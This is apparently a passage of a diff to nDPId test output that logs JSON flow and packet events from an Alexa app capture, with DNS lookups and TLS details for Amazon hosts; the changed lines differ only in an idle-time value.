00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1490976186818,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976186818,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWmJAAEARMzysECrYrBAqASHdADUAQT24ItEBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"} 
00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1490976186879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976186879,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl6vpAAEARopOsECoBrBAq2AA1Id0AUTsIItGBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAIgAENu8XXg=="} 00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976186879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.23.94"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186884,"flow_last_seen":1490976186884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976186884,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1490976186884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976186884,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8flZAAEAGlzCsECrYNu8XXq9wAbvy\/\/kGAAAAAKAC\/\/\/9UAAAAgQFtAQCCAoA9odQAAAAAAEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2703,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1490976187052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976187052,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwqiJAAOcGxG827xderBAq2AG7r3A+ML0a8v\/5B3ASH\/6mVwAAAgQFtAEDAwY="} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2705,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1490976187055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976187055,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofldAAEAGl0OsECrYNu8XXq9wAbvy\/\/kHPjC9G1AQAVfwyAAA"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2706,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186884,"flow_last_seen":1490976187057,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976187057,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2709,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186884,"flow_last_seen":1490976187167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1687,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976187167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2713,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976186884,"flow_last_seen":1490976187172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":418,"midstream":0,"thread_ts_msec":1490976187172,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186884,"flow_last_seen":1490976186884,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976186884,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1490976186884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976186884,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8flZAAEAGlzCsECrYNu8XXq9wAbvy\/\/kGAAAAAKAC\/\/\/9UAAAAgQFtAQCCAoA9odQAAAAAAEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2703,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1490976187052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976187052,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwqiJAAOcGxG827xderBAq2AG7r3A+ML0a8v\/5B3ASH\/6mVwAAAgQFtAEDAwY="} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2705,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1490976187055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976187055,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofldAAEAGl0OsECrYNu8XXq9wAbvy\/\/kHPjC9G1AQAVfwyAAA"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2706,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186884,"flow_last_seen":1490976187057,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976187057,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2709,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186884,"flow_last_seen":1490976187167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1687,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976187167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2713,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976186884,"flow_last_seen":1490976187172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":418,"midstream":0,"thread_ts_msec":1490976187172,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1490976187242,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976187242,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WmNAAEARM1KsECrYrBAqAeoEADUAKipZJj0BAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} 00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1490976187508,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976187508,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl6w9AAEARon6sECoBrBAq2AA16gQAUSKUJj2BgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAADoACwhwaXRhbmd1acASwC4AAQABAAAAOgAENu8csg=="} 00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976187508,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187511,"flow_last_seen":1490976187511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976187511,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1490976187511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976187511,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8IbxAAEAG7nasECrYNu8cspdlAbtMyaYzAAAAAKAC\/\/8I0wAAAgQFtAQCCAoA9oePAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2739,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1490976187571,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976187571,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3K9AAOcGjI427xyyrBAq2AG7l2UCDLyqTMmmNHASH\/7urAAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2742,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1490976187575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976187575,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoIb1AAEAG7omsECrYNu8cspdlAbtMyaY0Agy8q1AQAVc5HgAA"} 
-00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2743,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976187511,"flow_last_seen":1490976187577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976187577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01712{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2747,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976187511,"flow_last_seen":1490976187704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3439,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1490976187704,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187511,"flow_last_seen":1490976187511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976187511,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1490976187511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976187511,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8IbxAAEAG7nasECrYNu8cspdlAbtMyaYzAAAAAKAC\/\/8I0wAAAgQFtAQCCAoA9oePAAAAAAEDAwg="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2739,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1490976187571,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976187571,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3K9AAOcGjI427xyyrBAq2AG7l2UCDLyqTMmmNHASH\/7urAAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2742,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1490976187575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976187575,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoIb1AAEAG7omsECrYNu8cspdlAbtMyaY0Agy8q1AQAVc5HgAA"} +00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2743,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976187511,"flow_last_seen":1490976187577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976187577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01712{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2747,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976187511,"flow_last_seen":1490976187704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3439,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1490976187704,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, 